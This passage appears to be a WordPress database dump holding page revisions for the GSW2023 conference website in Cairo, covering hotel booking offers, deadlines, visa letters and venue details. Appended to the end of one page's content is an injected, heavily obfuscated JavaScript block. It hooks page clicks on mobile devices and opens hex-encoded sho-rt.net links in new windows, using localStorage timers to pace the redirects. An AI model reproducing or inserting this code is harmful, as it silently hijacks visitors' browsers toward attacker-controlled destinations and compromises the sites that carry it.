css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"200\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 04:33:26','2023-08-15 04:33:26','',3066,'https://gsw2023.com/?p=5199',0,'revision','',0),
(5200,1,'2023-08-15 16:42:37','2023-08-15 16:42:37','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" 